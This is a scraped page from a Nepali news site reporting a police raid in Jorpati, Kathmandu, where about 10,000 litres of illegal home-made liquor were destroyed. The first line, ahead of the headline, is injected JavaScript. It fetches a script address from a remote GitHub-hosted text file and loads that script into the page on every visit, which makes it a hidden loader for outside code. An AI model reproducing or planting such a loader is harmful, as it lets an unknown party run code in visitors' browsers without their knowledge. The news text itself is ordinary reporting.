;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रहरीद्वारा काठमाडौं जोरपाटीमा करिब १० हजार लिटर अबैद घरेलु मदिरा निर्माण स्थलमै नष्ट (फोटो भिडियो सहित) – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रहरीद्वारा काठमाडौं जोरपाटीमा करिब १० हजार लिटर अबैद घरेलु मदिरा निर्माण स्थलमै नष्ट (फोटो भिडियो सहित)
गोकर्नेश्वोर बिशेष

प्रहरीद्वारा काठमाडौं जोरपाटीमा करिब १० हजार लिटर अबैद घरेलु मदिरा निर्माण स्थलमै नष्ट (फोटो भिडियो सहित)

मदिरा निर्माण गर्ने व्यक्तिहरु फरार

फाल्गुन २० काठमाडौं |

काठमाडौको गोकर्नेश्वोर नगरपालिका वडा न ५ सुन्दर टोलबाट प्रहरीले ठुलो मात्रमा घरेलु मदिरा बरामद गरेको छ |  सुराकीको आधारमा अबैद रुपमा मदिरा उत्पादन गरि  वितरण गर्ने स्थलमा गइ मदिरा नष्ट गरेको हो | मदिरा निमार्ण गर्ने कच्चा पदार्थ १० हजार लिटर फेला परेको साथै तयारी मदिरा करिब ३ हजार लिटर बरामद गरि नस्ट गरेको थियो |   बौद्ध प्रहरी वृतका प्रहरी नायव उपरीक्षक नबिन कार्की र जोरपाटी प्रहरी विटका प्रमुख राजकुमार माझीको नेतृत्वमा गोकर्नेश्वोर नगरपालिका वडा न ५ को सुन्दर टोलबाट मदिरा बरामद गरिएको हो | फुर्वा लामाको घरको दोश्रो तल्लामा समेत २ टन मदिरा बरामद गरि नस्ट गरेको प्रहरीले जनाएको छ | मदिरा निर्माण गर्ने व्यक्तिहरु फरार रहेका छन | दैनिक रुपमा मदिरा कस्ले बनाउने र वितरण गर्ने गरेको थियो भन्ने अनुसन्धान भइरहेको प्रहरीले जनाएको छ |

No description available.

No description available.

No description available.

No description available.

No description available.

फोटो: अनिल बराइली 

फेसबुक प्रतिक्रियाहरु